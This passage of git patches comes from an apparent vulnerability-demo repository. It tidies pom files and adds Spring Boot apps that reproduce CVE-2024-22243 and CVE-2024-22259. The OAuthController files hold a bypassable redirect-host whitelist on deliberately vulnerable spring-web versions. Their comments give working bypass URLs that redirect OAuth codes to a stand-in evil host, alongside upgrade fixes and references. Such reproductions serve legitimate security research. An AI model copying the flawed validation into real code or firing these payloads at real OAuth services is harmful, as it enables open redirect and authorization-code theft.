b/dubbo/dubbo-hessian2-safe-reinforcement/pom.xml index 11355cdc..34ed8817 100644 --- a/dubbo/dubbo-hessian2-safe-reinforcement/pom.xml +++ b/dubbo/dubbo-hessian2-safe-reinforcement/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 2.1.11.RELEASE - 4.0.0 diff --git a/fastjson/pom.xml b/fastjson/pom.xml index a93758cc..c6585ab1 100644 --- a/fastjson/pom.xml +++ b/fastjson/pom.xml @@ -19,6 +19,17 @@ 1.2.68 + + org.python + jython + 2.5.3-rc1 + + + org.postgresql + postgresql + 42.5.0 + + com.xyh common diff --git a/jackson/pom.xml b/jackson/pom.xml index 24b3e34b..50b0dde3 100644 --- a/jackson/pom.xml +++ b/jackson/pom.xml @@ -88,7 +88,7 @@ - acc + com.codahale.metrics metrics-healthchecks 3.0.2 diff --git a/pom.xml b/pom.xml index e09a4391..0e883edd 100644 --- a/pom.xml +++ b/pom.xml @@ -47,92 +47,9 @@ 4.11 test - - - - org.mozilla - rhino - 1.7.6 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - maven-clean-plugin - 3.0.0 - - - - maven-resources-plugin - 3.0.2 - - - maven-compiler-plugin - 3.7.0 - - - maven-surefire-plugin - 2.20.1 - - - maven-jar-plugin - 3.0.2 - - - maven-install-plugin - 2.5.2 - - - maven-deploy-plugin - 2.8.2 - - - org.apache.maven.plugins diff --git a/shiro/auth-bypass-shiro-1-4-1/pom.xml b/shiro/auth-bypass-shiro-1-4-1/pom.xml index 18215b3a..0b14eb26 100644 --- a/shiro/auth-bypass-shiro-1-4-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-4-1/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-5-1/pom.xml b/shiro/auth-bypass-shiro-1-5-1/pom.xml index 92fb2643..033eba39 100644 --- a/shiro/auth-bypass-shiro-1-5-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-1/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-5-3/pom.xml b/shiro/auth-bypass-shiro-1-5-3/pom.xml index 197a9891..6afbe308 100644 --- a/shiro/auth-bypass-shiro-1-5-3/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-3/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-7-1/pom.xml b/shiro/auth-bypass-shiro-1-7-1/pom.xml index 079c2a0a..0c6d9b08 100644 --- a/shiro/auth-bypass-shiro-1-7-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-7-1/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-8-0/pom.xml b/shiro/auth-bypass-shiro-1-8-0/pom.xml index 2de5d4ca..ac7304cb 100644 --- a/shiro/auth-bypass-shiro-1-8-0/pom.xml +++ b/shiro/auth-bypass-shiro-1-8-0/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/spring/pom.xml b/spring/pom.xml index 680c8649..dffacb44 100644 --- a/spring/pom.xml +++ b/spring/pom.xml @@ -15,6 +15,7 @@ spring-boot-actuator-bug spring-cloud-config-server-CVE-2020-5410 spring-data-mongodb-spel-CVE-2022-22980 + spring-uricomponentsbuilder diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml b/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml index 7d6dd8ca..be2f2b57 100644 --- a/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml +++ b/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 2.0.3.RELEASE - 4.0.0 diff --git a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml index b7035208..856737a0 100644 --- a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 2.2.1.RELEASE - 4.0.0 diff --git a/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml index d693c060..dc3f703d 100644 --- a/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 2.2.2.RELEASE - 4.0.0 spring-cloud-config-server-CVE-2020-5410 diff --git a/spring/spring-uricomponentsbuilder/pom.xml b/spring/spring-uricomponentsbuilder/pom.xml new file mode 100644 index 00000000..c5fb0b4c --- /dev/null +++ b/spring/spring-uricomponentsbuilder/pom.xml @@ -0,0 +1,27 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 2.3.5.RELEASE + + + 4.0.0 + + spring-uricomponentsbuilder + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + \ No newline at end of file diff --git a/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java b/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java new file mode 100644 index 00000000..a2bb9780 --- /dev/null +++ b/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java @@ -0,0 +1,15 @@ +package com.threedr3am.bug.spring.uricomponentsbuilder; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +/** + * @author threedr3am + */ +@SpringBootApplication +public class Main { + + public static void main(String[] args) { + SpringApplication.run(Main.class, args); + } +} diff --git a/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java b/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java new file mode 100644 index 00000000..4821ff40 --- /dev/null +++ b/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java @@ -0,0 +1,74 @@ +package com.threedr3am.bug.spring.uricomponentsbuilder.controller; + +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.util.UriComponents; +import org.springframework.web.util.UriComponentsBuilder; + +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; +import java.util.Arrays; +import java.util.HashSet; +import java.util.Set; + +/** + * @author threedr3am + * + * CVE-2024-22243 + * + * Spring Framework 是一个开源的Java应用程序框架,UriComponentsBuilder是Spring Web中用于构建和操作URI的工具类。 + * 受影响版本中,由于 UriComponentsBuilder 处理URL时未正确过滤用户信息中的方括号 `[` ,攻击者可构造包含方括号的恶意URL绕过主机名验证。 + * 如果应用程序依赖UriComponentsBuilder.fromUriString()等方法对URL进行解析和校验,则可能导致验证绕过,出现开放重定向或SSRF漏洞。 + * + * ### 修复方案 + * 1. 将 org.springframework:spring-web 升级至 6.1.4 及以上版本 + * 2. 将 org.springframework:spring-web 升级至 6.0.17 及以上版本 + * 3. 将 org.springframework:spring-web 升级至 5.3.32 及以上版本 + * + * ### 参考链接 + * 1. https://www.oscs1024.com/hd/MPS-uwzo-gx91 + * 2. https://spring.io/security/cve-2024-22243 + * 3. https://github.com/spring-projects/spring-framework/commit/7ec5c994c147f0e168149498b1c9d4a249d69e87 + * 4. https://nvd.nist.gov/vuln/detail/CVE-2024-22243 + */ +@Controller +@RequestMapping("/oauth") +public class OAuthController { + + private static final Set whiteDomains = new HashSet<>(Arrays.asList(new String[]{ + ".fuckpdd.com" + })); + + /** + * 一般绕过oauth的host校验,可以开放重定向到恶意站点劫持code + * 访问:http://127.0.0.1:8080/oauth?redirect_uri=http%3A%2F%2Fwww.fuckpdd.com%5B%40www.evil.com%2Ftou + * + * + * @param redirectUri http://www.fuckpdd.com[@www.evil.com/tou + * @return + */ + @GetMapping + public String oauth(@RequestParam(name = "redirect_uri") String redirectUri, HttpServletResponse response) throws IOException { + UriComponents uriComponents = UriComponentsBuilder.fromUriString(redirectUri).build(); + String schema = uriComponents.getScheme(); + String host = uriComponents.getHost(); + String path = uriComponents.getPath(); + + System.out.printf("schema:%s\n", schema); + System.out.printf("host:%s\n", host); + System.out.printf("path:%s\n", path); + + boolean pass = false; + for (String whiteDomain : whiteDomains) { + if (host.endsWith(whiteDomain)) { + pass = true; + break; + } + } + if (!pass) return "error"; + + return "redirect:" + redirectUri; + } +} From 3f7fe9d8eab29f88fd0c6fb8362d21696b5cb95c Mon Sep 17 00:00:00 2001 From: threedr3am <929811313@qq.com> Date: Thu, 14 Mar 2024 23:05:17 +0800 Subject: [PATCH 5/5] fix any pom & add CVE-2024-22259 demo --- shiro/auth-bypass-shiro-1-4-1/pom.xml | 1 + shiro/auth-bypass-shiro-1-5-1/pom.xml | 1 + shiro/auth-bypass-shiro-1-5-3/pom.xml | 1 + shiro/auth-bypass-shiro-1-7-1/pom.xml | 1 + shiro/auth-bypass-shiro-1-8-0/pom.xml | 1 + .../actuator-1.2/pom.xml | 1 + .../actuator-1.3/pom.xml | 1 + .../actuator-1.4/pom.xml | 1 + .../actuator-1.5/pom.xml | 13 +--- .../actuator-2.0/pom.xml | 13 +--- .../pom.xml | 1 + .../bug/spring/config/server/Application.java | 0 .../spring/config/server/package-info.java | 0 .../src/main/resources/application.yml | 0 .../pom.xml | 1 + .../pom.xml | 1 + .../pom.xml | 1 + spring/spring-uricomponentsbuilder-2/pom.xml | 33 +++++++++ .../bug/spring/uricomponentsbuilder/Main.java | 15 ++++ .../controller/OAuthController.java | 74 +++++++++++++++++++ spring/spring-uricomponentsbuilder/pom.xml | 8 +- 21 files changed, 143 insertions(+), 25 deletions(-) rename spring/{spring-cloud-config-server(CVE-2019-3799) => spring-cloud-config-server-CVE-2019-3799}/pom.xml (95%) rename spring/{spring-cloud-config-server(CVE-2019-3799) => spring-cloud-config-server-CVE-2019-3799}/src/main/java/com/threedr3am/bug/spring/config/server/Application.java (100%) rename spring/{spring-cloud-config-server(CVE-2019-3799) => spring-cloud-config-server-CVE-2019-3799}/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java (100%) rename spring/{spring-cloud-config-server(CVE-2019-3799) => spring-cloud-config-server-CVE-2019-3799}/src/main/resources/application.yml (100%) create mode 100644 spring/spring-uricomponentsbuilder-2/pom.xml create mode 100644 spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java create mode 100644 spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java diff --git a/shiro/auth-bypass-shiro-1-4-1/pom.xml b/shiro/auth-bypass-shiro-1-4-1/pom.xml index 0b14eb26..65600748 100644 --- a/shiro/auth-bypass-shiro-1-4-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-4-1/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-5-1/pom.xml b/shiro/auth-bypass-shiro-1-5-1/pom.xml index 033eba39..1423f473 100644 --- a/shiro/auth-bypass-shiro-1-5-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-1/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-5-3/pom.xml b/shiro/auth-bypass-shiro-1-5-3/pom.xml index 6afbe308..d00854fe 100644 --- a/shiro/auth-bypass-shiro-1-5-3/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-3/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-7-1/pom.xml b/shiro/auth-bypass-shiro-1-7-1/pom.xml index 0c6d9b08..842e2b1c 100644 --- a/shiro/auth-bypass-shiro-1-7-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-7-1/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-8-0/pom.xml b/shiro/auth-bypass-shiro-1-8-0/pom.xml index ac7304cb..bcf8a10c 100644 --- a/shiro/auth-bypass-shiro-1-8-0/pom.xml +++ b/shiro/auth-bypass-shiro-1-8-0/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/spring/spring-boot-actuator-bug/actuator-1.2/pom.xml b/spring/spring-boot-actuator-bug/actuator-1.2/pom.xml index e5b439b1..9c96b228 100644 --- a/spring/spring-boot-actuator-bug/actuator-1.2/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-1.2/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.2.8.RELEASE + 4.0.0 diff --git a/spring/spring-boot-actuator-bug/actuator-1.3/pom.xml b/spring/spring-boot-actuator-bug/actuator-1.3/pom.xml index b9090740..60df3a39 100644 --- a/spring/spring-boot-actuator-bug/actuator-1.3/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-1.3/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.3.8.RELEASE + 4.0.0 diff --git a/spring/spring-boot-actuator-bug/actuator-1.4/pom.xml b/spring/spring-boot-actuator-bug/actuator-1.4/pom.xml index 0bfe7d4b..a7bf9e37 100644 --- a/spring/spring-boot-actuator-bug/actuator-1.4/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-1.4/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.4.7.RELEASE + 4.0.0 diff --git a/spring/spring-boot-actuator-bug/actuator-1.5/pom.xml b/spring/spring-boot-actuator-bug/actuator-1.5/pom.xml index 8eb31588..3f145784 100644 --- a/spring/spring-boot-actuator-bug/actuator-1.5/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-1.5/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.16.RELEASE + 4.0.0 @@ -39,18 +40,6 @@ - - - - org.springframework.boot - spring-boot-maven-plugin - - true - - - - - diff --git a/spring/spring-boot-actuator-bug/actuator-2.0/pom.xml b/spring/spring-boot-actuator-bug/actuator-2.0/pom.xml index e689f443..26e0b1b4 100644 --- a/spring/spring-boot-actuator-bug/actuator-2.0/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-2.0/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.0.5.RELEASE + 4.0.0 @@ -56,18 +57,6 @@ - - - - org.springframework.boot - spring-boot-maven-plugin - - true - - - - - diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml b/spring/spring-cloud-config-server-CVE-2019-3799/pom.xml similarity index 95% rename from spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml rename to spring/spring-cloud-config-server-CVE-2019-3799/pom.xml index be2f2b57..a72a9fb4 100644 --- a/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2019-3799/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.0.3.RELEASE + 4.0.0 diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/src/main/java/com/threedr3am/bug/spring/config/server/Application.java b/spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/Application.java similarity index 100% rename from spring/spring-cloud-config-server(CVE-2019-3799)/src/main/java/com/threedr3am/bug/spring/config/server/Application.java rename to spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/Application.java diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java b/spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java similarity index 100% rename from spring/spring-cloud-config-server(CVE-2019-3799)/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java rename to spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/src/main/resources/application.yml b/spring/spring-cloud-config-server-CVE-2019-3799/src/main/resources/application.yml similarity index 100% rename from spring/spring-cloud-config-server(CVE-2019-3799)/src/main/resources/application.yml rename to spring/spring-cloud-config-server-CVE-2019-3799/src/main/resources/application.yml diff --git a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml index 856737a0..ef86677d 100644 --- a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.2.1.RELEASE + 4.0.0 diff --git a/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml index dc3f703d..dfb9ba14 100644 --- a/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.2.2.RELEASE + 4.0.0 spring-cloud-config-server-CVE-2020-5410 diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml b/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml index b8648693..16dcc7db 100644 --- a/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.6.8 + 4.0.0 diff --git a/spring/spring-uricomponentsbuilder-2/pom.xml b/spring/spring-uricomponentsbuilder-2/pom.xml new file mode 100644 index 00000000..d7609148 --- /dev/null +++ b/spring/spring-uricomponentsbuilder-2/pom.xml @@ -0,0 +1,33 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 2.7.18 + + + 4.0.0 + + spring-uricomponentsbuilder-2 + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + org.springframework + spring-web + 5.3.32 + + + + \ No newline at end of file diff --git a/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java b/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java new file mode 100644 index 00000000..a2bb9780 --- /dev/null +++ b/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java @@ -0,0 +1,15 @@ +package com.threedr3am.bug.spring.uricomponentsbuilder; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +/** + * @author threedr3am + */ +@SpringBootApplication +public class Main { + + public static void main(String[] args) { + SpringApplication.run(Main.class, args); + } +} diff --git a/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java b/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java new file mode 100644 index 00000000..413e0b9c --- /dev/null +++ b/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java @@ -0,0 +1,74 @@ +package com.threedr3am.bug.spring.uricomponentsbuilder.controller; + +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.util.UriComponents; +import org.springframework.web.util.UriComponentsBuilder; + +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; +import java.util.Arrays; +import java.util.HashSet; +import java.util.Set; + +/** + * @author threedr3am + * + * CVE-2024-22259 + * + * 使用UricomponentsBuilder解析外部提供的URL(例如通过查询参数)并对解析URL的主机执行验证检查的应用程序可能容易受到公开重定向攻击, + * 如果在通过验证检查后使用该URL,则可能容易受到SSRF攻击。 + * 这与CVE-2024-22243相同,这是另一种输入不同的情况。 + * + * ### 修复方案 + * 1. 将 org.springframework:spring-web 升级至 6.1.5 及以上版本 + * 2. 将 org.springframework:spring-web 升级至 6.0.18 及以上版本 + * 3. 将 org.springframework:spring-web 升级至 5.3.33 及以上版本 + * + * ### 参考链接 + * https://spring.io/security/cve-2024-22259 + * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22259 + * + */ +@Controller +@RequestMapping("/oauth") +public class OAuthController { + + private static final Set whiteDomains = new HashSet<>(Arrays.asList(new String[]{ + ".fuckpdd.com" + })); + + /** + * 一般绕过oauth的host校验,可以开放重定向到恶意站点劫持code + * 访问:http://127.0.0.1:8080/oauth?redirect_uri=http%3A%2F%2F%40www.fuckpdd.com%5B%40www.evil.com%2Ftou + * + * + * @param redirectUri [CVE-2024-22259] -> http://@www.fuckpdd.com[@www.evil.com/tou + * [CVE-2024-22243] -> http://www.fuckpdd.com[@www.evil.com/tou + * @return + */ + @GetMapping + public String oauth(@RequestParam(name = "redirect_uri") String redirectUri, HttpServletResponse response) throws IOException { + UriComponents uriComponents = UriComponentsBuilder.fromUriString(redirectUri).build(); + String schema = uriComponents.getScheme(); + String host = uriComponents.getHost(); + String path = uriComponents.getPath(); + + System.out.printf("schema:%s\n", schema); + System.out.printf("host:%s\n", host); + System.out.printf("path:%s\n", path); + + boolean pass = false; + for (String whiteDomain : whiteDomains) { + if (host.endsWith(whiteDomain)) { + pass = true; + break; + } + } + if (!pass) return "error"; + + return "redirect:" + redirectUri; + } +} diff --git a/spring/spring-uricomponentsbuilder/pom.xml b/spring/spring-uricomponentsbuilder/pom.xml index c5fb0b4c..53b8b853 100644 --- a/spring/spring-uricomponentsbuilder/pom.xml +++ b/spring/spring-uricomponentsbuilder/pom.xml @@ -5,7 +5,7 @@ org.springframework.boot spring-boot-starter-parent - 2.3.5.RELEASE + 2.7.18 4.0.0 @@ -22,6 +22,12 @@ org.springframework.boot spring-boot-starter-web + + + org.springframework + spring-web + 5.3.31 + \ No newline at end of file